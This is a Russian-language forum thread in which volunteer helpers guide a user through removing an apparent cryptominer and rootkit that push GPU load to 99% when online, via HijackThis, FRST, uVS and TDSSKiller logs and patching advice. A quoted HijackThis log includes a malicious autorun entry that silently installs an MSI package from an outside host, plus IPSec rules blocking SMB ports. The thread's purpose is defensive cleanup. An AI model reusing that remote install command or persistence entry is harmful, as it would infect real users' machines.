Здравствуйте. Заметил резкое повышение нагрузки на графический процессор до 99% даже если не запущено ни одно приложение. Буквально 3-4 часа назад выполнял лечение компьютера утилитой Dr.Web CureIt, была обнаружена всего лишь одна угроза, которую утилита и лечила. Запомнил только название Mysa (вряд ли конечно проблема в этом). Но в итоге ГП нагружен, но при отключении от сети Интернет возвращается в норму (0-1%). При повторном подключении к сети нагрузка возвращается на максимальный уровень. Прошу о помощи, всё-таки какими же средствами защищать свой компьютер, просто несколько лет стоял Microsoft Security Essentials и проблем не наблюдалось, буквально вот за последний месяц программа начала обнаруживать постоянно элементы категории Троян (Trojan:win32/Bitrep.A, Trojan:Win32/Tiggre!rfn).
Последний раз редактировалось G-Lauf; 27.05.2018 в 15:33.
Причина: Чуть не забыл об архиве из инструкции.
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) G-Lauf, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
Код:
O4 - HKLM\..\Run: [RtHDVCpl] = C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q
O4 - HKU\.DEFAULT\..\Run: [script_fcbd] = D:\Uplay\Far Cry 3 Blood Dragon\fcbd.bat (file missing)
O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2018/04/22) - {eae4eda0-e8dc-475b-9889-9e8e3124a1bd} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00avg - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: \AVG\Overseer - C:\Program Files (x86)\AVG\Antivirus\setup\overseer.exe (file missing)
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Выполнил указанные инструкции. При сканировании Farbar Recovery Scan Tool вылезала ошибка, что программа не отвечает и постоянно появлялась во время проверки файлов по пути C:\Windows\system32\... на разных файлах. Решил перезагрузить компьютер и сканирование прошло полностью (может я где-то накосячил, и заранее прошу прощения). До этого перезагрузка проводилась, как по инструкции "пофиксить" после использования программы HijackThis. Ну и прикрепил полученные файлы.
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
В автозагрузке майнеров нет, но могут запускать удалённо через уязвимости.
Это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в прошлом году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 11 (64-bit) v.8.0.110 Внимание! Скачать обновления ^Удалите старую версию и установите новую (jre-8u172-windows-x64.exe)^
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 14 ActiveX v.14.0.0.145 Внимание! Скачать обновления
Adobe Flash Player 14 Plugin v.14.0.0.145 Внимание! Скачать обновления
Adobe Flash Player 29 PPAPI v.29.0.0.171
------------------------------- [ Browser ] -------------------------------
Yandex v.18.4.0.2080 Внимание! Скачать обновления ^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
Закройте все броузеры, запустите командный файл script.cmd из папки с uVS. Когда откроется окно со скриптом, нажмите "Выполнить".
Компьютер перезагрузится.
В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
Скопировал скрипт. Закрыл браузер. Запустил файл script. Вылезает предупреждение системы безопасности о том что не даётся проверить издателя, нажимаю запустить и на долю секунды появляется окно командной строки и тут же исчезает. Перезагрузка компьютера не происходит.
Скопируйте скрипт в буфер обмена.
Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.
В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
Вроде получилось. И, кстати, да, во время активации скприпта вылезло окно на подтверждение удаления svchost, но в скобках было написано что само приложение не удалится. Просто самостоятельно, наблюдая за процессами в диспетчере задач, я заметил что с момента подключения к сети, именно этот процесс активируется и тут же подскакивает нагрузка на ГП.
Прошу прощения, быть может я что-то не так сделал. Но по пути C:\TDSSKiller лежит папка C:\TDSSKiller_Quarantine\ уже непосредственно с папкой под названием времени и даты проведения и другими файлами. И, кстати, не знаю как и почему, но деятельность ГП в простое пришла в норму, примерно в 19:20 (МСК). Никаких дополнительных проверок или действий не совершал, при этом процесс на который у меня были все подозрения присутствовал. Но сейчас после проверки TDSS и перезагрузки его нет. Я в недоумении.
Это Вы карантин прикрепили, его в открытый доступ нельзя, в карантин по ссылке соответствующей загрузите.
А я просил ещё лог, он в корне диска C: - текстовый файл.
TDSSKiller руткит удалил, всё по плану.
Прошу прощения, запутался. Я ещё немного запутался с вложениями. Превышен доступный объём присылаемых вложений. В меню управления вложениями не могу понять как удалить некоторые.
Удалите вложения.
Упакуйте с помощью WinRar в архив с максимальным сжатием, может влезет.
Загрузите в доступное облачное хранилище или на файлообменник (rghost.ru, например) и дайте ссылку в теме.
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: